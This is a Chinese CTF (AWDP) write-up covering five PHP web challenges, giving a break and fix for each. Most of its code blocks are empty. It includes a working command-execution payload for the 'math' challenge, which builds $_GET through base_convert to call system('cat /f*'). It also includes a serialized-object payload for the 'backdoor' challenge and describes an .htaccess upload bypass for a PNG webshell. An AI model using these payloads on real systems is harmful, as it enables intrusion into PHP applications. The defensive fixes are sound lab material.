某内部awdp测试赛
本文最后更新于 2024年6月5日 下午
ezXXE
附件:
1 |
|
break
有回显xxe
1 |
|
fix
libxml_disable_entity_loader(false);
改为libxml_disable_entity_loader(true);
禁用外部实体
方案二、过滤用户提交的XML数据 关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。
1 |
|
1 |
|
easyupload
源码
1 |
|
break
上传配置文件.htaccess
1 |
|
上传png图片🐎
fix
黑名单加上.htaccess
后缀
1 |
|
math
源码
1 |
|
break
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /f*
1 |
|
则$pi=_GET
$$pi=$_GET
($$pi){pi}(($$pi){cos})=$_GET{pi}($_GET{cos})
fix
黑名单加上大{}和$$blacklist = [' ', '\t', '\r', '\n','\'', '"', '
‘, ‘[‘, ‘]‘,’{‘,’}‘,’$‘];`
backdoor
源码
1 |
|
break
在 call_user_func($this->class);
可以触发无参函数并且要在自带函数里面
构造cmd=unserialze&data=O:8:"backdoor":4:{s:4:"path";s:14:"/var/www/html/";s:4:"argv";N;s:5:"class";s:7:"phpinfo";s:12:"do_exec_func";b:1;}
可以触发phpinfo
要触发__sleep
来利用include
包含文件
https://github.com/AFKL-CUIT/CTF-Challenges/blob/master/CISCN/2022/backdoor/writup/writup.md
exp:
1 |
|
fix
直接删除 new $class($argv);
fuzzyrce
源码
1 |
|
1 |
|
break
1 |
|
fix
删除eval